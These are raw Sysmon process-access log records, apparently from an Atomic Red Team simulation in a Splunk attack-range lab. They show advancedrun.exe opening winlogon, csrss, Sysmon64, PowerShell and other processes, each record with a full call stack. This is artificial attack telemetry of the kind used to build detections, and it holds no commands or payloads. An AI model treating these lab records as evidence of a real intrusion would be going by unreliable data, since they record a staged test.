Explorer\IEXPLORE.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003983244Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.695{834264DD-F464-61EA-7C04-000000002702}3088892C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-F392-61EA-4A04-000000002702}5408C:\Program Files\Internet Explorer\iexplore.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003983243Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.695{834264DD-F464-61EA-7D04-000000002702}45841288C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DB07-61EA-8800-000000002702}4836C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983242Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.695{834264DD-F464-61EA-7D04-000000002702}45841288C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DB00-61EA-7F00-000000002702}4768C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983241Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.695{834264DD-F464-61EA-7C04-000000002702}3088892C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-E497-61EA-F401-000000002702}2136C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003983240Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.695{834264DD-F464-61EA-7D04-000000002702}45841288C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF8-61EA-6100-000000002702}4392C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorWindow Manager\DWM-2 10341000x80000000000000003983239Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.695{834264DD-F464-61EA-7C04-000000002702}3088892C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-E497-61EA-F301-000000002702}944C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003983238Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.695{834264DD-F464-61EA-7D04-000000002702}45841288C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF8-61EA-5C00-000000002702}4148C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983237Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.695{834264DD-F464-61EA-7C04-000000002702}3088892C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-E491-61EA-F201-000000002702}3896C:\Program Files\Notepad++\notepad++.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003983236Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.695{834264DD-F464-61EA-7D04-000000002702}45841288C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF8-61EA-5B00-000000002702}4100C:\Windows\system32\csrss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983235Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.695{834264DD-F464-61EA-7C04-000000002702}3088892C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DB6F-61EA-B100-000000002702}2348C:\Windows\System32\msdtc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000003983234Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.695{834264DD-F464-61EA-7D04-000000002702}45841288C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF8-61EA-5500-000000002702}4052C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983233Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.695{834264DD-F464-61EA-7C04-000000002702}3088892C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DB13-61EA-9A00-000000002702}5612C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003983232Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.695{834264DD-F464-61EA-7D04-000000002702}45841288C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF7-61EA-5300-000000002702}3936C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983231Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.695{834264DD-F464-61EA-7C04-000000002702}3088892C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DB12-61EA-9900-000000002702}5508C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003983230Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.695{834264DD-F464-61EA-7D04-000000002702}45841288C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF6-61EA-4300-000000002702}3824C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983229Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.695{834264DD-F464-61EA-7C04-000000002702}3088892C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DB12-61EA-9700-000000002702}5364C:\Windows\Sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003983228Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 